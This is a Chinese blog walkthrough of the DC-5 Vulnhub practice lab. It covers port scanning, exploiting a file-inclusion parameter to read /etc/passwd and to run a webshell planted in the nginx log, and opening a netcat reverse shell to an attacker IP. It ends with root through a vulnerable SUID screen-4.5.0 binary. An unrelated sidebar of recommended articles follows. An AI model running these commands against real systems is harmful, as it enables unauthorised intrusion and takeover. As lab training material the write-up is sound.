DC--5

最新推荐文章于 2024-03-12 11:35:32 发布
最新推荐文章于 2024-03-12 11:35:32 发布
阅读量96 收藏
点赞数
分类专栏: DC系列 文章标签: 网络安全 信息安全 主机渗透 DC系列 nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/128440543
版权

信息收集

确定主机IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221216162311599

端口扫描

image-20221216162417725

nmap 扫描

image-20221216163110130

WEB测试

目录扫描

image-20221216163526527

网页观察

http://192.168.84.181/footer.php 每次刷新都不一样,但是年份为2018、2017、2019、2020

image-20221216163647834

image-20221216163654972

http://192.168.84.181/thankyou.php,同样刷新该界面,年份也会发生变化,但是与footer.php页面相同

猜测有可能thankyou.php包含了页脚

其他页面的页脚都为2019,只有该页面才会随之变化,有可能调用了footer.php

尝试猜测

调用可能是通过file名称进行调用

image-20221216164243963

image-20221216164437596

传参值可能为file

服务器为Linux

image-20221216164529331

对file传参 file=/etc/passwd

读取到文件

image-20221216164606651

利用中间件日志写webshell

image-20221216165438543

当前中间件为nginx,nginx的日志默认路径为

nginx日志文件在路径 /var/log/nginx
日志开关在Nginx配置文件 /etc/nginx/nginx.conf

读取日志配置文件

image-20221216165903898

成功/失败日志记录位置

image-20221216170039605

把木马写入日志中,然后再配合文件包含 拿到shell

随便访问站点的某个网页,放入repeater模块

image-20221216170943192

image-20221216171101023

再次访问http://192.168.84.181/thankyou.php?file=/var/log/nginx/access.log

image-20221216171208074

蚁剑连接

url = http://192.168.84.181/thankyou.php?file=/var/log/nginx/access.log

密码 = 1

连接成功

image-20221216171345289

提权

反弹shell

蚁剑终端:nc -e /bin/bash 192.168.84.174 10086

image-20221216171716677

调用标准终端

python -c "import pty;pty.spawn('/bin/bash')"

image-20221216171846474

查看是否有可用的suid提权

find / -user root -perm -4000 -print 2>/dev/null

image-20221216172550083

观察到有一个screen-4.5.0

关于screen

image-20221216172755086

screen提权

1、搜索相关漏洞及下载poc到本地

image-20221216173108685

2、分析sh文件

image-20221216173319534

开启http服务,将三个文本使用wget下载到/tmp目录下

python -m http.server 10000

3、直接执行./dc5.sh,等待编译成功后查看用户权限

image-20221221183114559

image-20221221183153062

小白学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-DC降压IC
weixin_50697266的博客
06-21 2230
DC-DC降压IC 深圳市航誉微电子有限公司型号输入 耐压输出电压输出 电流反馈 电压工作 频率效率静态 工作 电流待机 电流封装直接替换LM259645V5.0V/ 可调输出/ 3.3V/12V3A1.23V150K90% (Max)10mA80uATO-263-5L TO-220-5LLM2596/AP1501LM2596HV63V5.0V/ 可调输出/
DC-DC与LDO的区别及原理
热门推荐
硬件之家,技术前行
04-17 3万+
一、DC-DC与LDO的区别 LDO 低压差线性稳压器(low dropout voltage regulator),仅能使用在降压应用中。也就是输出电压必需小于输入电压。 优点:稳定性好,负载响应快。输出纹波小。 缺点:效率低,输入输出的电压差不能太大。负载不能太大,目前最大的LDO为5A(但要保证5A的输出还有很多的限制条件) DC/DC 直流电压转直流电压。严格来讲,LDO也是DC/
DC-5靶机详细渗透流程
braty_的博客
01-27 2036
DC-5靶机渗透详细流程
名词解释:DC-13
qq_43009770的博客
03-02 1633
就用满足DC-13的负载去接输出,输出不挂掉那就说明产品输出带感性负载能力在DC-13。额定电流I/Ie = 1.1,额定电压U/Ue = 1.1 ,至于T0.95 = 300ms和180ms,没看懂。T0.95 是个指标,指定信号电流的上升时间。是IEC60947-5-1中定义的一种负载。输出的感性负载驱动能力用什么来评估?make(闭合)break断开。DC-13是负载的使用分类。感性负载指标:DC-13。
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 7051
DC-5靶机渗透测试详细教程
DC-DC产生负电压
mainbanp
03-21 1678
产生一个负电压使用。实现方法来源。
DC-5靶机渗透测试
读书 买花 长大
03-14 1518
DC-5
DC-DC转换电路简介
lida2003的专栏
03-02 2310
因此,在设计DC-DC转换器时,正确选择和使用电感是非常重要的。总的来说,电容在DC-DC转换器设计中具有重要的作用,包括滤波、稳定回路、保护元件、降低干扰和提供瞬态响应等方面,对于提高系统的性能和稳定性至关重要。综上所述,增加电感可以在DC-DC转换器中起到良好的滤波效果,稳定输出电流,并减少电磁干扰的产生,从而降低模拟干扰的水平,使系统工作更加稳定可靠。为了减少DC-DC转换器引起的干扰,可以采取一些措施,如合适的滤波器设计、良好的地布线、选择合适的电磁兼容性材料和设计等。
Vulnhub DC-7
Pai_Space
03-26 5334
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
DC-1靶场详解
苏生要努力
03-12 2905
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
DC-UPS
03-23
5. 电池欠压保护:当电池电压过低时,DC-UPS将停止放电,以避免对电池造成过度放电,延长电池寿命。 6. 充电/充满/放电状态指示:通过指示灯或显示屏告知用户当前的电池状态,让用户了解电源的供电情况。 在技术...
simulink仿真-PFC、DC-DC
04-12
在电力电子领域,Simulink被广泛用于设计和仿真各种电源转换系统,如PFC(功率因数校正)和DC-DC转换器。本文将深入探讨标题和描述中涉及的"simulink仿真-PFC、DC-DC"的相关知识点。 首先,我们来看功率因数校正...
DC-DC电路设计技巧及器件选型原则
03-24
DC-DC电路设计技巧及器件选型原则 DC-DC电路设计技巧及器件选型原则是指在直流电路中将一个电压值的电能变为另一个电压值的电能的装置。DC-DC转换器是实现这一功能的关键器件,包括控制芯片、电感线圈、二极管、...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8412
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于ssm和vue的 校园短期闲置资源置换平台源码 校园短期闲置资源置换平台代码(高分毕设项目源码)
08-23
1. 校园短期闲置资源置换平台代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是ssm,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
4S店客户管理小程序-毕业设计,基于微信小程序+SSM+MySql开发,源码+数据库+论文答辩+毕业论文+视频演示
08-23
4S店客户管理小程序-毕业设计,基于微信小程序+SSM+MySql开发,源码+数据库+论文答辩+毕业论文+视频演示 社会的发展和科学技术的进步,互联网技术越来越受欢迎。手机也逐渐受到广大人民群众的喜爱,也逐渐进入了每个用户的使用。手机具有便利性,速度快,效率高,成本低等优点。 因此,构建符合自己要求的操作系统是非常有意义的。 本文从管理员、用户的功能要求出发,4S店客户管理系统中的功能模块主要是实现管理员服务端;首页、个人中心、用户管理、门店管理、车展管理、汽车品牌管理、新闻头条管理、预约试驾管理、我的收藏管理、系统管理,用户客户端:首页、车展、新闻头条、我的。门店客户端:首页、车展、新闻头条、我的经过认真细致的研究,精心准备和规划,最后测试成功,系统可以正常使用。分析功能调整与4S店客户管理系统实现的实际需求相结合,讨论了微信开发者技术与后台结合java语言和MySQL数据库开发4S店客户管理系统的使用。 关键字:4S店客户管理系统小程序 微信开发者 Java技术 MySQL数据库 软件的功能: 1、开发实现4S店客户管理系统的整个系统程序; 2、管理员服务端;首页、个人中心、用户管理、门店管理、车展管理、汽车品牌管理、新闻头条管理、预约试驾管理、我的收藏管理、系统管理等。 3、用户客户端:首页、车展、新闻头条、我的 4、门店客户端:首页、车展、新闻头条、我的等相应操作; 5、基础数据管理:实现系统基本信息的添加、修改及删除等操作,并且根据需求进行交流信息的查看及回复相应操作。
Java项目:基于SSM框架+mysql个性化美食推荐系统含源码和毕业论文
最新发布
08-23
一、项目简介 本项目是一套基于SSM框架+mysql个性化美食推荐系统含源码和毕业论文 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 项目都经过严格调试,eclipse或者idea 确保可以运行! 该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值 二、技术实现 jdk版本:1.8 及以上 ide工具:IDEA或者eclipse 数据库: mysql5.5及以上 后端:spring+springmvc+mybatis+maven+mysql 前端:jsp,css,js 三、系统功能 1、系统角色主要包括:管理员、用户 2、系统功能 主要功能包括: 用户登录 用户注册 首页 个人中心 修改密码 管理员信息 用户管理 美食信息管理 美食信息留言管理 美食信息收藏管理 美食订单管理 博主推荐管理 店址管理 口味管理 轮播图管理 前台主要功能包括: 用户登录 用户注册 首页 个性美食展示 热门美食推荐 美食详情 点我收藏 立即预订 个人中心 美食收藏 美食订单 余额充值 发表留言 博主推荐 跳转到后台等功能
DC-DC转换器设计与应用手册
"DC-DC 设计指南,涵盖了高密度DC-DC转换器技术、控制引脚功能与应用、设计要求、电磁兼容性考虑、功率阵列中的电流共享、热性能信息、附件模块如Autoranging Rectifier Module (ARM)、Filter/Autoranging Rectifier...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值